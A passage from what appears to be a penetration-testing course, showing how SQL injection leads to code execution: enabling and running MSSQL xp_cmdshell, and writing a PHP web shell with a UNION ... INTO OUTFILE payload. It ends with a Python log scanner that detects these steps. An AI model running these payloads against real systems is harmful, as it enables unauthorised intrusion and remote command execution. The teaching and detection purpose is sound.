Depending on which database system we are attacking, we will need to adapt our strategy for achieving code execution.
In Microsoft SQL Server, the xp_cmdshell function takes a command as a string, passes it to the operating system's command shell, and returns the output as rows of text. The function is disabled by default, and once it has been enabled it must be invoked with the EXECUTE keyword rather than SELECT.
In our database, the Administrator user has the required permissions. Let's simulate the SQL injection by enabling the xp_cmdshell function with the impacket-mssqlclient tool:
kali@kali:~$ impacket-mssqlclient <Administrator:[email protected]> -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
SQL> EXECUTE sp_configure 'show advanced options', 1;
[*] INFO(SQL01\\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
Listing 27 - Enabling xp_cmdshell
Having connected to the MSSQL instance from the Kali VM, we set show advanced options to 1 and applied the change to the running configuration with the RECONFIGURE command. We then enabled xp_cmdshell and applied that change with another RECONFIGURE.
With the feature enabled, we can run any Windows shell command through the EXECUTE statement followed by the function name:
SQL> EXECUTE xp_cmdshell 'whoami';
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
nt service\\mssql$sqlexpress
NULL
Listing 28 - Executing commands through xp_cmdshell
Now that we have full control over the system, upgrading the SQL shell to a standard reverse shell is straightforward.
Let's now move on to MySQL databases.
Although the various MySQL versions offer no single function that leads directly to RCE, we can abuse the SELECT ... INTO OUTFILE statement to write a file onto the web server.
For this attack to work, the operating system user that the database software runs as must have write permission on the destination path.
As an example, we will write webshell.php to the MySQL-backed target application using the UNION query we studied earlier.
We place a single line of PHP code in the first column and specify /var/www/html/tmp/webshell.php as the file to write:
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
Listing 29 - Writing a web shell through the INTO OUTFILE directive
The resulting PHP code file looks like this:
<? system($_REQUEST['cmd']); ?>
Listing 30 - PHP reverse shell
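As an added defensive counterpart to both procedures above (this is not part of the original course text), the following Python script scans query-log lines for the staging steps described here: sp_configure enabling 'show advanced options' and 'xp_cmdshell', a subsequent xp_cmdshell call, and a UNION ... INTO OUTFILE write into a web-served directory, while leaving an ordinary INTO OUTFILE export unflagged. The "date time engine user statement" log format, the sample lines and the WEB_ROOTS list are constructed assumptions; real SQL Server Audit and MySQL general_log formats differ.

```python
import re

# Constructed sample feed (not from the page): "date time engine user statement".
SAMPLE_LOG = """\
2024-05-01 10:00:01 mssql sa EXECUTE sp_configure 'show advanced options', 1;
2024-05-01 10:00:02 mssql sa RECONFIGURE;
2024-05-01 10:00:03 mssql sa EXECUTE sp_configure 'xp_cmdshell', 1;
2024-05-01 10:00:04 mssql sa EXECUTE xp_cmdshell 'whoami';
2024-05-01 10:00:05 mssql app SELECT name FROM products WHERE id = 4;
2024-05-01 10:01:00 mysql www SELECT * FROM users WHERE name = '' UNION SELECT "<?php system($_GET['cmd']);?>", null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
2024-05-01 10:01:01 mysql www SELECT id INTO OUTFILE '/var/lib/mysql-files/export.csv' FROM users;
"""

# Assumed web-served directories: a file written here is what turns INTO OUTFILE into code execution.
WEB_ROOTS = ("/var/www/", "/srv/http/", "/usr/share/nginx/", "inetpub")

RULES = [
    ("advanced-options-enable", re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    ("xp_cmdshell-enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell-exec", re.compile(r"\bxp_cmdshell\s+'", re.I)),
    ("into-outfile", re.compile(r"""\bINTO\s+(?:OUTFILE|DUMPFILE)\s+["']([^"']+)["']""", re.I)),
]

def classify(statement):
    """Return the list of rule tags that fire on one SQL statement."""
    hits = []
    for tag, rx in RULES:
        m = rx.search(statement)
        if not m:
            continue
        if tag == "into-outfile":
            path = m.group(1)
            if any(root in path for root in WEB_ROOTS):
                tag = "into-outfile-webroot"      # file lands where PHP may run
            elif "UNION" in statement.upper():
                tag = "into-outfile-union"        # injection shape, non-web target
            else:
                continue                          # plain data export: no alert
        hits.append(tag)
    return hits

def scan(log_text):
    """Return (timestamp, engine, user, tag) for every alerting statement."""
    alerts = []
    for line in log_text.splitlines():
        date, time, engine, user, stmt = line.split(" ", 4)
        for tag in classify(stmt):
            alerts.append((f"{date} {time}", engine, user, tag))
    return alerts

for alert in scan(SAMPLE_LOG):
    print(*alert)
```

The RECONFIGURE lines and the benign product query produce no alert, so the output is the four-step chain an analyst would want to see correlated by user and time.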